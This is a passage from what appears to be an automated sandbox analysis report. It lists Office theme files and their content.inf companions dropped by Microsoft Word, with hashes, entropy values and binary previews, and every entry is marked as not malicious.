                                                                                                                                              Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .M.e.t.r.o.p.o.l.i.t.a.n...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....

                                                                                                                                              C:\Users\user\AppData\Local\Temp\TCD6C26.tmp\Dividend.thmx

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:Microsoft OOXML
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):570901
                                                                                                                                              Entropy (8bit):7.674434888248144
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6144:D2tTXiO/3GH5SkPQVAqWnGrkFxvay910UUTWZJarUv9TA0g8:kX32H+VWgkFxSgGTmarUv9T
                                                                                                                                              MD5:D676DE8877ACEB43EF0ED570A2B30F0E
                                                                                                                                              SHA1:6C8922697105CEC7894966C9C5553BEB64744717
                                                                                                                                              SHA-256:DF012D101DE808F6CD872DFBB619B16732C23CF4ABC64149B6C3CE49E9EFDA01
                                                                                                                                              SHA-512:F40BADA680EA5CA508947290BA73901D78DE79EAA10D01EAEF975B80612D60E75662BDA542E7F71C2BBA5CA9BA46ECAFE208FD6E40C1F929BB5E407B10E89FBD
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:PK..........1AE,.{E...#P......[Content_Types].xml..Mo.0.....Z..N7.=l......V0.-o..j?...H..sa......./UCb.'...r...w.i..e..<[....{2..U.m..N.{...r.....3.fj.o......2.*....;.L.6..&,D.Cld8...a.gZf.......r-v..><....~/......|Zk.......a.R&.d.(.$..6..}.:.....3......1..[.p.....?..+....R...y,.fod.....e...-.|..#..]j....n:...f...-J...i.^.:Y....T..........m^..~GNp../e}...N....a..5.d.8YcN..5.d.8Y...7..A..e...7Q."3...../.sL._...v...n..b..2].v....n.t....Z...Uk...j.&.Z....im|.r....B.....7DaBuN.... ...>..>..>..>..>..>..>.........V}-.....Q}#.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7FaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}..&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7EaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}3.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b.\}..)...A.......[..PK..........1A.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70...........84P....

                                                                                                                                              C:\Users\user\AppData\Local\Temp\TCD6C26.tmp\content.inf

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):282
                                                                                                                                              Entropy (8bit):3.5459495297497368
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6:Q+sxnxUXvBAuRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnypJymD0wbnKNAH/lMz1
                                                                                                                                              MD5:76340C3F8A0BFCEDAB48B08C57D9B559
                                                                                                                                              SHA1:E1A6672681AA6F6D525B1D17A15BF4F912C4A69B
                                                                                                                                              SHA-256:78FE546321EDB34EBFA1C06F2B6ADE375F3B7C12552AB2A04892A26E121B3ECC
                                                                                                                                              SHA-512:49099F040C099A0AED88E7F19338140A65472A0F95ED99DEB5FA87587E792A2D11081D59FD6A83B7EE68C164329806511E4F1B8D673BEC9074B4FF1C09E3435D
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .D.i.v.i.d.e.n.d...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....

                                                                                                                                              C:\Users\user\AppData\Local\Temp\TCD6C56.tmp\Banded.thmx

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:Microsoft OOXML
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):562113
                                                                                                                                              Entropy (8bit):7.67409707491542
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:12288:/dy5Gtyp/FZ9QqjdxDfSp424XeavSktiAVE0:/dizp1ndpqpMZnV
                                                                                                                                              MD5:4A1657A3872F9A77EC257F41B8F56B3D
                                                                                                                                              SHA1:4DDEA85C649A2C1408B5B08A15DEF49BAA608A0B
                                                                                                                                              SHA-256:C17103ADE455094E17AC182AD4B4B6A8C942FD3ACB381F9A5E34E3F8B416AE60
                                                                                                                                              SHA-512:7A2932639E06D79A5CE1D3C71091890D9E329CA60251E16AE4095E4A06C6428B4F86B7FFFA097BF3EEFA064370A4D51CA3DF8C89EAFA3B1F45384759DEC72922
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:PK..........1AE,.{E...#P......[Content_Types].xml..Mo.0.....Z..N7.=l......V0.-o..j?...H..sa......./UCb.'...r...w.i..e..<[....{2..U.m..N.{...r.....3.fj.o......2.*....;.L.6..&,D.Cld8...a.gZf.......r-v..><....~/......|Zk.......a.R&.d.(.$..6..}.:.....3......1..[.p.....?..+....R...y,.fod.....e...-.|..#..]j....n:...f...-J...i.^.:Y....T..........m^..~GNp../e}...N....a..5.d.8YcN..5.d.8Y...7..A..e...7Q."3...../.sL._...v...n..b..2].v....n.t....Z...Uk...j.&.Z....im|.r....B.....7DaBuN.... ...>..>..>..>..>..>..>.........V}-.....Q}#.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7FaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}..&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7EaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}3.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b.\}..)...A.......[..PK..........1A.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70...........84P....

                                                                                                                                              C:\Users\user\AppData\Local\Temp\TCD6C56.tmp\content.inf

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):278
                                                                                                                                              Entropy (8bit):3.535736910133401
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6:Q+sxnxUXeAlFkRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnyRGymD0wbnKNAH/lMz1
                                                                                                                                              MD5:487E25E610F3FC2EEA27AB54324EA8F6
                                                                                                                                              SHA1:11C2BB004C5E44503704E9FFEEFA7EA7C2A9305C
                                                                                                                                              SHA-256:022EC5077279A8E447B590F7260E1DBFF764DE5F9CDFD4FDEE32C94C66D4A1A2
                                                                                                                                              SHA-512:B8DF351E2C0EF101CF91DC02E136A3EE9C1FDB18294BECB13A29D676FBBE791A80A58A18FBDEB953BC21EC54EB7608154D401407C461ABD10ACB94CE8AD0E092
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .B.a.n.d.e.d...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....

                                                                                                                                              C:\Users\user\AppData\Local\Temp\TCD6D14.tmp\Parallax.thmx

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):924687
                                                                                                                                              Entropy (8bit):7.824849396154325
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:12288:lsadD3eLxI8XSh4yDwFw8oWR+6dmw2ZpQDKpazILv7Jzny/ApcWqyOpEZULn:qLxI8XSh4yUF/oWR+mLKpYIr7l3ZQ7n
                                                                                                                                              MD5:97EEC245165F2296139EF8D4D43BBB66
                                                                                                                                              SHA1:0D91B68CCB6063EB342CFCED4F21A1CE4115C209
                                                                                                                                              SHA-256:3C5CF7BDB27592791ADF4E7C5A09DDE4658E10ED8F47845064DB1153BE69487C
                                                                                                                                              SHA-512:8594C49CAB6FF8385B1D6E174431DAFB0E947A8D7D3F200E622AE8260C793906E17AA3E6550D4775573858EA1243CCBF7132973CD1CF7A72C3587B9691535FF8
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:PK..........1AS'......ip......[Content_Types].xml..n.@.._......8ie'......}.......(y...H}......3Fi..%2.v?..3..._...d=..E.g.....7.i.-.t5.6......}}.m9r.......m...ML.g.M.eV$.r..*.M..l0...A...M..j;.w={o.f..F....i..v......5..d;..D.ySa...M&..qd*w>.O.{h...|w..5.]..'.CS<.:8C}.g.|E.../..>..].Tnml..I.......r.Gv.E....7.;.E......4/l.....6.K.C?1qz.O.v_..r......\c.c.>..lS........X.N.3N.sN..N.)'.%'..'..N.pL.E...T.!..CR....Ie..k.o..M..w.B.0}..3....v..+....,.q..pz.......v{.;....s3.|..V..ZZ......0.[.....x.....!.!~.8.e..n..&.}p....s.i.. ..[]...q.r....~..+.A\...q............e.-)h9..."Z.>...5-C..`..g.}........r.A.+..\...r.>.... .W.\...re?..%.-/hiA..ZR.r.W.D.\}.EK..kZ.>......5..9.&T......Wlu.b....}..+.A\...q......~.WK.Z^..........>.h..`......}.....^h....L...H...!...r.>... .W...\...rE?............-+hIA..\}..r...-}..i..`..G..j..).&T......Wlu.b....}..+.A\...q......~.WK.Z^..........>.h..`......}.....^j..K.L...H...!...r.>... .W...\...rE?............-+hIA..\}..r...-}..i.

                                                                                                                                              C:\Users\user\AppData\Local\Temp\TCD6D14.tmp\content.inf

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):282
                                                                                                                                              Entropy (8bit):3.51145753448333
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6:Q+sxnxUXKsWkRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxny6svymD0wbnKNAH/lMz1
                                                                                                                                              MD5:7956D2B60E2A254A07D46BCA07D0EFF0
                                                                                                                                              SHA1:AF1AC8CA6FE2F521B2EE2B7ABAB612956A65B0B5
                                                                                                                                              SHA-256:C92B7FD46B4553FF2A656FF5102616479F3B503341ED7A349ECCA2E12455969E
                                                                                                                                              SHA-512:668F5D0EFA2F5168172E746A6C32820E3758793CFA5DB6791DE39CB706EF7123BE641A8134134E579D3E4C77A95A0F9983F90E44C0A1CF6CDE2C4E4C7AF1ECA0
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .P.a.r.a.l.l.a.x...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....

                                                                                                                                              C:\Users\user\AppData\Local\Temp\TCD6DE3.tmp\Quotable.thmx

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:Microsoft OOXML
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):966946
                                                                                                                                              Entropy (8bit):7.8785200658952
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24576:qBcvGBGhXQir6H1ws6+iU0YuA35VuinHX2NPs:ccvGBGdQ5CsMxQVj3yPs
                                                                                                                                              MD5:F03AB824395A8F1F1C4F92763E5C5CAD
                                                                                                                                              SHA1:A6E021918C3CEFFB6490222D37ECEED1FC435D52
                                                                                                                                              SHA-256:D96F7A63A912CA058FB140138C41DCB3AF16638BA40820016AF78DF5D07FAEDD
                                                                                                                                              SHA-512:0241146B63C938F11045FB9DF5360F63EF05B9B3DD1272A3E3E329A1BFEC5A4A645D5472461DE9C06CFE4ADB991FE96C58F0357249806C341999C033CD88A7AF
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:PK..........1A.......F`......[Content_Types].xml..n.@.._.y.ac $..,........-..g@.u.G.+t.:........D1...itgt>...k..lz;].8Kg^....N.l..........0.~}....ykk.A`..N..\...2+.e.c..r..P+....I.e.......|.^/.vc{......s..z....f^...8...'.zcN&.<....}.K.'h..X..y.c.qnn.s%...V('~v.W.......I%nX`.....G.........r.Gz.E..M.."..M....6n.a..V.K6.G?Qqz..............\e.K.>..lkM...`...k.5...sb.rbM8..8..9..pb..R..{>$..C.>......X..iw.'..a.09CPk.n...v....5n..Uk\...SC...j.Y.....Vq..vk>mi......z..t....v.]...n...e(.....s.i......]...q.r....~.WV/.j.Y......K..-.. Z..@.\.P..W...A..X8.`$C.F(.P..H...W..r.>... .W.C..zAV+.....@.\..h....r)...R..-..........c..0F...@Z.....v.+.A\...q.......ZAV'p)...R.D....K..-...h....eP..........(.P..H...W..r.>... .W.C..zAV+.....@.\..h....r)...R..-.............0A...@Z.....v.+.A\...q.......ZAV'p)...R.D....K..-...h....eP.........w(.P..H...W..r.>... .W.C..zAV+.....@.\..h....r)...R..-..........T..GI..~.....~....PK..........1A.s@.....O......._rels/.rels...J.

                                                                                                                                              C:\Users\user\AppData\Local\Temp\TCD6DE3.tmp\content.inf

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):282
                                                                                                                                              Entropy (8bit):3.5323495192404475
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6:Q+sxnxUXhduDARELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnyxdumymD0wbnKNAH/lMz1
                                                                                                                                              MD5:BD6B5A98CA4E6C5DBA57C5AD167EDD00
                                                                                                                                              SHA1:CCFF7F635B31D12707DC0AC6D1191AB5C4760107
                                                                                                                                              SHA-256:F22248FE60A55B6C7C1EB31908FAB7726813090DE887316791605714E6E3CEF7
                                                                                                                                              SHA-512:A178299461015970AF23BA3D10E43FCA5A6FB23262B0DD0C5DDE01D338B4959F222FD2DC2CC5E3815A69FDDCC3B6B4CB8EE6EC0883CE46093C6A59FF2B042BC1
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .Q.u.o.t.a.b.l.e...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....

                                                                                                                                              C:\Users\user\AppData\Local\Temp\TCD6DE4.tmp\Berlin.thmx

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:Microsoft OOXML
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):976001
                                                                                                                                              Entropy (8bit):7.791956689344336
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24576:zHM7eZGgFiHMRej4N9tpytNZ+tIw5ErZBImlX0m:zHM7eZGgFiHMRej++NZ+F5WvllZ
                                                                                                                                              MD5:9E563D44C28B9632A7CF4BD046161994
                                                                                                                                              SHA1:D3DB4E5F5B1CC6DD08BB3EBF488FF05411348A11
                                                                                                                                              SHA-256:86A70CDBE4377C32729FD6C5A0B5332B7925A91C492292B7F9C636321E6FAD86
                                                                                                                                              SHA-512:8EB14A1B10CB5C7607D3E07E63F668CFC5FC345B438D39138D62CADF335244952FBC016A311D5CB8A71D50660C49087B909528FC06C1D10AF313F904C06CBD5C
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:PK.........{MB.f}......p......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.v...(=.v........F_..U..G...T.e.y)[..b.......3.m....6.X5.P........_...b../..}.-......~.-..z..d.......j.^.+c..E.V..~3}..U.7..~p.>.E..9^d....4%}.E.$....N..r....<....%...%.?....w.u...h........D...w.....h........Dkw...x..T....T....T....T....T....T....j...."[.J.....;..!4...M...............t.n-.{..skp...[;.......F...j.7...4fC...K1..K/..K-..K+..K)..K'..f9......Fl._.........d0...?7K7].........A.......Fl.............Ft....u.......Ft........\.......w....R.......R.......R........o...].`.....A....#.`..\.....S.._...4...o.........W<x#..............w#...r.nD..]....\.~....|......b...^...Z...V...R...N..W<x......l._...l..?.A......xp_Q..y<h..tL.i.?HNn...]..........r.nD..]~.........wy~7......Ft...........E/|c.

                                                                                                                                              C:\Users\user\AppData\Local\Temp\TCD6DE4.tmp\content.inf

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):278
                                                                                                                                              Entropy (8bit):3.5270134268591966
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6:Q+sxnxUXa3Y1kRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnyt1mymD0wbnKNAH/lMz1
                                                                                                                                              MD5:327DA4A5C757C0F1449976BE82653129
                                                                                                                                              SHA1:CF74ECDF94B4A8FD4C227313C8606FD53B8EEA71
                                                                                                                                              SHA-256:341BABD413AA5E8F0A921AC309A8C760A4E9BA9CFF3CAD3FB2DD9DF70FD257A6
                                                                                                                                              SHA-512:9184C3FB989BB271B4B3CDBFEFC47EA8ABEB12B8904EE89797CC9823F33952BD620C061885A5C11BBC1BD3978C4B32EE806418F3F21DA74F1D2DB9817F6E167E
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .B.e.r.l.i.n...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....

                                                                                                                                              C:\Users\user\AppData\Local\Temp\TCD6E23.tmp\Wood_Type.thmx

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:Microsoft OOXML
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1649585
                                                                                                                                              Entropy (8bit):7.875240099125746
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24576:L368X6z95zf5BbQ6U79dYy2HiTIxRboyM/LZTl5KnCc:r68kb7UTYxGIxmnp65
                                                                                                                                              MD5:35200E94CEB3BB7A8B34B4E93E039023
                                                                                                                                              SHA1:5BB55EDAA4CDF9D805E36C36FB092E451BDDB74D
                                                                                                                                              SHA-256:6CE04E8827ABAEA9B292048C5F84D824DE3CEFDB493101C2DB207BD4475AF1FD
                                                                                                                                              SHA-512:ED80CEE7C22D10664076BA7558A79485AA39BE80582CEC9A222621764DAE5EFA70F648F8E8C5C83B6FE31C2A9A933C814929782A964A47157505F4AE79A3E2F9
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:PK..........1A..u._....P......[Content_Types].xml..Ms.@.....!...=.7....;a.h.&Y..l..H~..`;...d..g/..e..,M..C...5...#g/."L..;...#. ]..f...w../._.2Y8..X.[..7._.[...K3..#.4......D.]l.?...~.&J&....p..wr-v.r.?...i.d.:o....Z.a|._....|.d...A....A".0.J......nz....#.s.m.......(.]........~..XC..J......+.|...(b}...K!._.D....uN....u..U..b=.^..[...f...f.,...eo..z.8.mz....."..D..SU.}ENp.k.e}.O.N....:^....5.d.9Y.N..5.d.q.^s..}R...._E..D...o..o...o...f.6;s.Z]...Uk6d.j..MW....5[C].f#...l;u.M..Z.../iM|...b...S.....0.zN.... ...>..>..>..>..>..>..>........e...,..7...F(L.....>.ku...i...i...i...i...i...i...i........yi.....G...1.....j...r.Z]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o|^Z....Q}.;.o...9.Z..\.V...............................jZ......k.pT...0.zN.... ...>..>..>..>..>..>..>........e...,..7...f(L.....>.ku...i...i...i...i...i...i...i........yi.......n.....{.._f...0...PK..........1A.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...

                                                                                                                                              C:\Users\user\AppData\Local\Temp\TCD6E23.tmp\content.inf

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):284
                                                                                                                                              Entropy (8bit):3.5552837910707304
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6:Q+sxnxUXtLARELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnygymD0wbnKNAH/lMz1
                                                                                                                                              MD5:5728F26DF04D174DE9BDFF51D0668E2A
                                                                                                                                              SHA1:C998DF970655E4AF9C270CC85901A563CFDBCC22
                                                                                                                                              SHA-256:979DAFD61C23C185830AA3D771EDDC897BEE87587251B84F61776E720ACF9840
                                                                                                                                              SHA-512:491B36AC6D4749F7448B9A3A6E6465E8D97FB30F33EF5019AF65660E98F4570711EFF5FC31CBB8414AD9355029610E6F93509BC4B2FB6EA79C7CB09069DE7362
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .W.o.o.d._.T.y.p.e...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....

                                                                                                                                              C:\Users\user\AppData\Local\Temp\TCD6F2F.tmp\Gallery.thmx

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:Microsoft OOXML
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1091485
                                                                                                                                              Entropy (8bit):7.906659368807194
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24576:oBpmCkw3Tg/euEB+UdoC4k7ytHkHA6B/puqW2MIkTeSBmKrZHQ:MR3c/AseydwppC7veSBmWHQ
                                                                                                                                              MD5:2192871A20313BEC581B277E405C6322
                                                                                                                                              SHA1:1F9A6A5E10E1C3FFEB6B6725C5D2FA9ECDF51085
                                                                                                                                              SHA-256:A06B302954A4C9A6A104A8691864A9577B0BFEA240B0915D9BEA006E98CDFFEC
                                                                                                                                              SHA-512:6D8844D2807BB90AEA6FE0DDDB9C67542F587EC9B7FC762746164B2D4A1A99EF8368A70C97BAD7A986AAA80847F64408F50F4707BB039FCCC509133C231D53B9
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:PK...........G`.jaV....P......[Content_Types].xml...n.@...W......T@.mwM.E....)....y...H}.N..ll8.h5g6Q.=3_......?...x..e^Di.p.^.ud...(Y/..{w..r..9.../M...Q*{..E...(.4..>..y,.>..~&..b-.a.?..4Q2Q=.2.......m....>-....;]......N'..A...g.D.m.@(}..'.3Z....#....(+....-q<uq.+....?....1.....Y?Oy......O"..J?....Q$zT.].7.N..Q Wi.....<.........-..rY....hy.x[9.b.%-<.V?.(......;r.+...Q<.;U.....4...!'k...s.&..)'k...d.s..}R....o".D.I..7..7.KL.7..Z.....v..b.5.2].f....l.t....Z...Uk...j.&.U-....&>.ia1..9lhG..Q.P.'P.U}.k..rU..rU..rU..rU..rU..rU..rU..rU_EK_}.zi.....G.........j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..h.oT/-c..`....7FaBu.@-W.A.]..U}H.U}H.U}H.U}H.U}H.U}H.U}H.U}.-}...e...,..7...&(L.....>.kw...i...i...i...i...i...i...i.......I...U_.....vT.....}..\...v..W.!-W.!-W.!-W.!-W.!-W.!-W.!-W.U...7.....k.pT...0..O.... ...>..>..>..>..>..>..>......f..2V}....W>jO....5..].?.o..oPK...........G.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70.

                                                                                                                                              C:\Users\user\AppData\Local\Temp\TCD6F2F.tmp\content.inf

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):280
                                                                                                                                              Entropy (8bit):3.5301133500353727
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6:Q+sxnxUXp2pRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnyZ2vymD0wbnKNAH/lMz1
                                                                                                                                              MD5:1C5D58A5ED3B40486BC22B254D17D1DD
                                                                                                                                              SHA1:69B8BB7B0112B37B9B5F9ADA83D11FBC99FEC80A
                                                                                                                                              SHA-256:EBE031C340F04BB0235FE62C5A675CF65C5CC8CE908F4621A4F5D7EE85F83055
                                                                                                                                              SHA-512:4736E4F26C6FAAB47718945BA54BD841FE8EF61F0DBA927E5C4488593757DBF09689ABC387A8A44F7C74AA69BA89BEE8EA55C87999898FEFEB232B1BA8CC7086
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .G.a.l.l.e.r.y...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....

                                                                                                                                              C:\Users\user\AppData\Local\Temp\TCD6FAF.tmp\Savon.thmx

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:Microsoft OOXML
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1204049
                                                                                                                                              Entropy (8bit):7.92476783994848
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24576:+3zSQBxvOUIpHLYTCEmS1Wu09jRalJP3sdgnmAOFt0zU4L0MRx5QNn5:+bvI5UTCPu09qP3JPOFoR4N5
                                                                                                                                              MD5:FD5BBC58056522847B3B75750603DF0C
                                                                                                                                              SHA1:97313E85C0937739AF7C7FC084A10BF202AC9942
                                                                                                                                              SHA-256:44976408BD6D2703BDBE177259061A502552193B1CD05E09B698C0DAC3653C5F
                                                                                                                                              SHA-512:DBD72827044331215A7221CA9B0ECB8809C7C79825B9A2275F3450BAE016D7D320B4CA94095F7CEF4372AC63155C78CA4795E23F93166D4720032ECF9F932B8E
                                                                                                                                              Malicious:false
